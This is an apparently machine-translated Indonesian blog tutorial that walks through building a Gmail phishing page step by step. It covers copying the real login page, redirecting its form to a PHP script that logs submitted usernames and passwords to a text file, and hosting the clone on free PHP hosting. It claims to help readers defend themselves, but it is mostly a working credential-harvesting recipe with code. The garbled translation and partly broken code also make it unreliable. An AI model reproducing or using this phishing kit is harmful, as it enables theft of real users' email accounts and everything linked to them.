Phishing adalah proses mencuri informasi sensitif, seperti username, password, dan informasi bank, dengan
berpura-pura menjadi seseorang Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker berpura-pura menjadi bank
Anda. Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk memperbarui account Anda
sebelum kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah Anda klik pada
Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login rincian,
itu mengirimnya ke email hacker atau toko di server web nya. Hacker yang menciptakan yang terbaik,
paling menipu halaman web phishing yang berpengetahuan di daerah HTML dan pemrograman PHP. Di
bawah ini saya akan menunjukkan contoh sederhana beberapa langkah-langkah hacker yang dibutuhkan
untuk membuat situs web phishing. Dengan melihat langkah hacker akan ambil, akan membantu Anda
mempertahankan diri dari serangan itu.
1. Pertama hacker memilih target. Yang paling populer target phishing serangan layanan e-mail seperti
Hotmail dan Gmail karena mereka yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda,
dia juga mendapat akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain Anda gunakan.
Dalam contoh ini kita akan berpura-pura hacker memilih Gmail sebagai nya target.
2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan Seluruh halaman utama. Saya
menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan browser untuk keamanan dan
kustomisasi) Jadi saya akan pergi ke. http://www.gmail.com dan klik File -> halaman Simpan sebagai ...,
atau cukup tekan <CTR> + S yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan
halaman web dan tekan Simpan.
3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The alasan
Anda ingin nama "index" begitu ketika Anda meng-upload ke web host dan seseorang pergi ke
Icon_charly_link_green, halaman indeks adalah halaman pertama yang muncul.
4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya menguatkan
informasi Anda. Di bawah ini adalah script PHP sederhana yang log dan menyimpan informasi login Anda
ketika Anda klik "Sign in". Untuk melihat cara kerjanya, copy dan paste kode berikut ke notepad.
Selanjutnya simpan ke dalam direktori yang sama seperti Anda menyimpan halaman Gmail, dan nama itu
phish.php. Dalam Selain ke halaman phish.php, membuat file teks baru kosong dan beri nama list.txt.
PHP Code:
<?php // This marks the beginning of the PHP script.
PHP Code:
Header(“Location:
https://www.google.com/accounts/Serv...=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.co m%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa ult<mplcac
he=2 “); // once you click “Sign in” in the fake website, this redirects
you to the real Gmail website, making the whole process look more
legit.
PHP Code:
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file
“list.txt” and get it ready for appending data. Which in this case is your
username and password.
PHP Code:
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
} // This section simply assigns all the information going through
this form to a variable. This includes your username and password.
Fwrite($handle, “rn”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file
“list.txt”
exit;
> /? / Marks akhir program PHP.
Sejauh ini anda akan melihat berikut di folder anda:
5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya PHP script. Untuk melihat
apa yang akan dilakukan hacker, membuka Gmail utama halaman yang bernama index.htm dengan notepad.
6. Tekan <CTR> + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".
7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script dan Anda harus melihat:
bentuk
PHP Code:
<id = "gaia_loginform" action = "https: / / www.google.com/accounts/Serv...?service=mail"
Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki yang benar dengan melihat "bentuk id"
nama di atas. Ubah Icon_charly_link_green yang antara action = "" untuk phish.php. Ini akan membuat
bentuk tunduk kepada Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan
melihat
kode:
metode = "post"
Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET". Apa yang dilakukan adalah
metode GET menyampaikan informasi yang Anda ketik melalui URL sehingga script PHP dapat log itu.
8. Simpan dan tutup file tersebut.
9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang mendukung PHP. Dengan
pencarian Google sederhana Anda bisa datang dengan banyak yang termasuk dalam kategori ini.
10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada "List.txt" file. Setiap
perusahaan hosting harus memiliki pilihan CHMOD berikutnya ke setiap file. Pilih opsi ini dan mengubah
izin file untuk "List.txt" ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-
orang yang menggunakan host yang sama atau hanya sesuatu yang mirip dengan Google:
"Yourwebhostname chmod".
11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green Anda
untuk website Anda dan Anda akan melihat replika halaman Gmail. Ketik username / password dan klik
Daftar masuk ini seharusnya diarahkan Anda ke halaman Gmail nyata.
12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda manajer atau akan
http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini yang paling umum web host yang anda
gunakan dapat memberikan yang berbeda mencari URL. Sekarang jika saya menaruh nama pengguna dari
"myusername" dan password
dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:
PHP Code:
ltmpl = default
ltmplcache = 2
terus = http://mail.google.com/mail/?
service = mail
rm-palsu
Email = username
Passwd = mypassword
rmShown = 1
signin = Masuk
AST =
Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan sandi. Scary, eh?
Hehehehe
WHAT'S NEW?
Loading...
0 comments:
Post a Comment